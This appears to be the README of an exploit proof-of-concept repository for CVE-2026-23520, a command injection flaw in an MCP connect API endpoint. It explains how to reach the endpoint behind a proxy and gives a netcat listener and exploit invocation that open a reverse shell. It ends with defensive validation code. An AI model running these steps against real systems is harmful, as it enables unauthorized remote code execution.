kikechans/-Educational-PoC-CVE-2026-23520
# CVE-2026-23520: Model Context Protocol (MCP) Connect RCE - Educational PoC - Arcane
**DISCLAIMER: This repository and the scripts contained within are strictly for educational and academic purposes only.**
The information provided here is intended to help security researchers, system administrators, and students understand the mechanics of command injection vulnerabilities and virtual host routing within controlled laboratory environments (such as Capture The Flag platforms).
**Never use this tool against any system, network, or infrastructure without explicit, written permission from the owner.** The authors take no responsibility for any misuse or damage caused by this software.
## Context and Vulnerability Overview
This repository provides a Proof of Concept (PoC) for exploiting **CVE-2026-23520** within the context of the **Model Context Protocol (MCP)** implementation in certain application stacks (like Arcane v1.13.0).
### The Flaw
The vulnerability is a classic Command Injection flaw. The API endpoint (`/api/mcp/connect`) accepts a JSON payload to configure a new server connection. The payload includes a `serverConfig` object containing `command` and `args` fields.
Because the application fails to properly sanitize these fields before executing them on the host operating system, an attacker can supply malicious bash commands (such as a reverse shell) instead of a legitimate service path.
### The Catch (Virtual Host Routing)
In many real-world or CTF deployments, simply sending the exploit to the main IP address will result in a `404 Not Found` error. This happens because the vulnerable component (e.g., `MCPJam Inspector`) is hosted behind a reverse proxy (like Nginx) that routes traffic based on the `Host` header.
This PoC differs from standard exploits by explicitly allowing the user to specify the **Virtual Host (vhost)** to bypass the proxy routing rules and hit the vulnerable application directly.
## Usage
This script requires Python 3 and the `requests` library.
```bash
pip install requests
```
### Syntax
```bash
python3 exploit_vhost.py
```
### Example (CTF Environment)
1. Set up a netcat listener on your machine:
   ```bash
   nc -lvnp 4444
   ```
2. Run the exploit, specifying the hidden virtual host:
   ```bash
   python3 exploit_vhost.py 10.129.x.x 443 mcp.target.local 10.10.x.x 4444
   ```
*Note: A "Read timed out" error is expected and indicates that the reverse shell has been successfully executed and is holding the connection open.*
## Mitigation
Administrators should ensure they are running the latest patched version of the software. If patching is not immediately possible, restrict access to the `/api/mcp/connect` endpoint and ensure strict input validation is applied to all `serverConfig` parameters.
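
The input validation recommended above can be sketched as follows. This is an added example, not code from Arcane, MCPJam Inspector or this repository: only the `serverConfig`, `command` and `args` field names come from the description above, while the allowlist paths, `validate_server_config`, `decide` and `ConfigRejected` are hypothetical. It treats the request as a selection from an operator-defined allowlist rather than as free-form input, and returns an argv list meant for shell-free execution.

```python
import re

# Assumption: operator-maintained allowlist (hypothetical paths). Each permitted
# launcher maps to the exact server scripts it may start.
ALLOWED_SERVERS = {
    "/usr/bin/node": {"/opt/mcp/servers/files/index.js"},
    "/usr/bin/python3": {"/opt/mcp/servers/search/server.py"},
}
# Trailing arguments: short, no whitespace, quotes or shell metacharacters.
SAFE_ARG = re.compile(r"[A-Za-z0-9_./:=@-]{1,128}")
MAX_ARGS = 8

class ConfigRejected(ValueError):
    """Raised when a connect request must not be executed."""

def validate_server_config(body):
    """Return an argv list for shell-free execution, or raise ConfigRejected."""
    cfg = body.get("serverConfig") if isinstance(body, dict) else None
    if not isinstance(cfg, dict):
        raise ConfigRejected("serverConfig must be an object")
    command, args = cfg.get("command"), cfg.get("args")
    if not isinstance(command, str) or command not in ALLOWED_SERVERS:
        raise ConfigRejected("command is not an allowlisted launcher")
    if not isinstance(args, list) or not 1 <= len(args) <= MAX_ARGS:
        raise ConfigRejected("args must be a list of 1 to %d items" % MAX_ARGS)
    if not all(isinstance(a, str) for a in args):
        raise ConfigRejected("args must all be strings")
    # args[0] must be the script itself, so no interpreter flag (-c, -e, ...)
    # can be placed ahead of it and turn the launcher into a code runner.
    if args[0] not in ALLOWED_SERVERS[command]:
        raise ConfigRejected("args[0] is not an allowlisted server script")
    for arg in args[1:]:
        if not SAFE_ARG.fullmatch(arg):
            raise ConfigRejected("argument contains disallowed characters")
    return [command, *args]

def decide(body):
    """Map a request body to 'allow' or 'reject: <reason>' for logging."""
    try:
        validate_server_config(body)
        return "allow"
    except ConfigRejected as exc:
        return "reject: %s" % exc

# Constructed sample bodies (not captured traffic).
GOOD = {"serverConfig": {"command": "/usr/bin/node", "args": [
    "/opt/mcp/servers/files/index.js", "--root=/srv/data"]}}
SHELL = {"serverConfig": {"command": "bash", "args": ["-c", "echo constructed"]}}
```

The returned list is intended for an exec-style call that takes an argument vector (for example `subprocess.run(argv, shell=False)`), so no shell ever parses the values; rejected requests are worth logging, since a `command` outside the allowlist on this endpoint is a strong signal of probing.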